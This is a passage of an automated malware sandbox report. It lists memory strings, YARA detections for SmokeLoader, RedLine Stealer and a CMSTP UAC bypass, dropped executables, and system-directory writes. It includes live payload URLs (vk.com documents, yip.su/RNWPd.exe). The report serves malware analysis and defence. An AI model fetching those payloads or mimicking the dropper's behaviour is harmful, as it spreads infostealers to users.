Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGi
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZ
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzK
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TP
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQ
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsEC
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc863235369_679548730?hash=VLR7cQ444BmBjXLp6la3lUFGFg05ZJB7nkcmssw9Kvz&dl=1NJlbpp
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.ru
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000024.00000000.1419179675.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000024.00000000.1373594900.00000000071B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://yip.su/RNWPd
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su/RNWPd.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://yip.su/redirect-

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Writes many files with high entropy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P entropy: 7.99475810581	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe (copy) entropy: 7.99475810581	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe entropy: 7.99695778151	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe entropy: 7.99695778151	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe entropy: 7.99904461084	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe entropy: 7.99904461084	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: lgX7lgUL1w.exe, type: SAMPLE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen

PE file contains section with special chars

Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401615 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401615
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401658 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401658
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	8_2_00403406
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0040340F NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_0040340F
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401620 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401620
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401524
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0040162D NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_0040162D
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401635 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401635
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033D2 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033D2
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033E1 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033E1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033FB NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033FB
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033B7 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033B7

Creates files inside the system directory

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\Machine
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\User
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Source: C:\Windows\SysWOW64\schtasks.exe	File created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Detected potential crypto function

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359EB10	0_2_00007FF7E359EB10
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3588F50	0_2_00007FF7E3588F50
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A0560	0_2_00007FF7E35A0560
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359DC30	0_2_00007FF7E359DC30
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359F360	0_2_00007FF7E359F360
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A2290	0_2_00007FF7E35A2290
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3582A60	0_2_00007FF7E3582A60
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358E2F0	0_2_00007FF7E358E2F0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359C160	0_2_00007FF7E359C160
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3592934	0_2_00007FF7E3592934
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35969D0	0_2_00007FF7E35969D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A89D0	0_2_00007FF7E35A89D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35869D0	0_2_00007FF7E35869D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3594890	0_2_00007FF7E3594890
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35988C0	0_2_00007FF7E35988C0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35940D0	0_2_00007FF7E35940D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A3F70	0_2_00007FF7E35A3F70
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3583720	0_2_00007FF7E3583720
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A1800	0_2_00007FF7E35A1800
